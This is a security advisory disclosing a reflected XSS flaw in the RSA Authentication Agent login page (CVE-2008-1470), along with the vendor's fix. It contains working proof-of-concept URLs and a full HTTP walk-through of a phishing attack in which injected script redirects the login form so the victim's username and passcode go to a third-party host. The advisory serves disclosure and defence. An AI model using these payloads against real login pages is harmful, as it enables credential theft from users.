by

XSS on RSA Authentication Agent login page

Vulnerability found:
05 December 2007

Vendor informed:
13 December 2007

Severity level:
Medium/High

Credits:
Found by Jan Fry and Adrian Pastor - ProCheckUp Ltd (www.procheckup.com). ProCheckUp thanks RSA for being so cooperative and responding so fast.

Description:
RSA Authentication Agent is vulnerable to a vanilla XSS on the login page.

Vulnerable server-side program: '/WebID/IISWebAgentIF.dll'

Unfiltered parameter: 'postdata'

Consequences
An attacker may be able to cause execution of malicious scripting code in the browser of a victim user who clicks on a link to a RSA Authentication Agent login page. Such code would run within the context of the target domain.

This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: session IDs or passwords) to unauthorised third parties.

Notes

It is believed that this vulnerability was originally reported in 2005 (BID 13168). However, In the original report, only version 5.2 of the Authentication Agent was mentioned to be vulnerable. Additionally, nothing was said regarding the possibility of exploiting this XSS as a GET request (as opposed to POST). Therefore, the vulnerability can be exploited via a malicious URL, since visiting a URL results in the web browser submitting a GET request. Since the XSS condition occurs on the login page, the bug is highly suitable for advanced XSS phishing attacks as illustrated in the proof of concept below. Please note that this is issue is different from CAN-2003-0389 and CVE-2005-3329.

CVE reference

CVE-2008-1470

BID

28277

Successfully tested on

RSA Authentication Agent 5.3.0.258 for Web for Internet Information Services
COMPLETE ATTACK WALK-THROUGH FOR XSS PHISHING ATTACK:
Step 1: Victim is tricked to click on the specially-crafted URL:

HTTP Request:

GET /WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=
%22%3E%3Cscript%3Edocument.forms[0].action=%22http: //procheckup.com?%22%3C/script%3E%3Ca%20b=%22 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-gb
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)
Host: target-domain.foo
Connection: Keep-Alive

Step 2: Victim fills in 'User ID' and 'Passcode' fields and clicks on "Log In":

HTTP request - notice the victim's username and passcode are submitted to a third-party site (procheckup.com in this case):

POST http: //procheckup.com/? HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-gb
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; .NET CLR 1.1.4322)
Host: procheckup.com
Content-Length: 116
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: __utma=105825218.1973702853.1197971766.1197981134.1197988777.4; __utmz=105825218.1197971766.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=105825218

stage=useridandpasscode&referrer=%2F&sessionid=0&postdata=&authntype=2&username=MYUSERNAME&passcode=MYSECRETPASSWORD
Proof of concept:
Simple XSS Proof of Concept (PoC) URLs:

https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22&authntype=2&username=test&passcode=test

https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E%3Ca%20b=%22

The injected payload in the previous examples is: "><script>alert("XSS")</script><a b="

The following specially-crafted URL performs an advanced XSS phishing attack. After the victim enters his/her username and passcode, the credentials are forwarded to a third-party site (procheckup.com in this case) and logged by the attacker:

https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Edocument.forms[0].action=%22http://procheckup.com?%22%3C/script%3E%3Ca%20b=%22&authntype=2&username=anyvaluehere&passcode=anyvaluehere

https://target-domain.foo/WebID/IISWebAgentIF.dll?stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata=%22%3E%3Cscript%3Edocument.forms[0].action=%22http://procheckup.com?%22%3C/script%3E%3Ca%20b=%22

The injected payload in the previous examples is:
"><script>document.forms[0].action="http://procheckup.com?"</script><a b="

How to fix:
The vendor has stated that this issue was addressed in the RSA Authentication Agent 5.3.3.378. RSA customers can download the upgrade from the RSA web site.

References:
http://www.procheckup.com/research/views/vulnerabilities

http://www.rsa.com/node.aspx?id=2807

Legal:
Copyright 2008 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes. Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.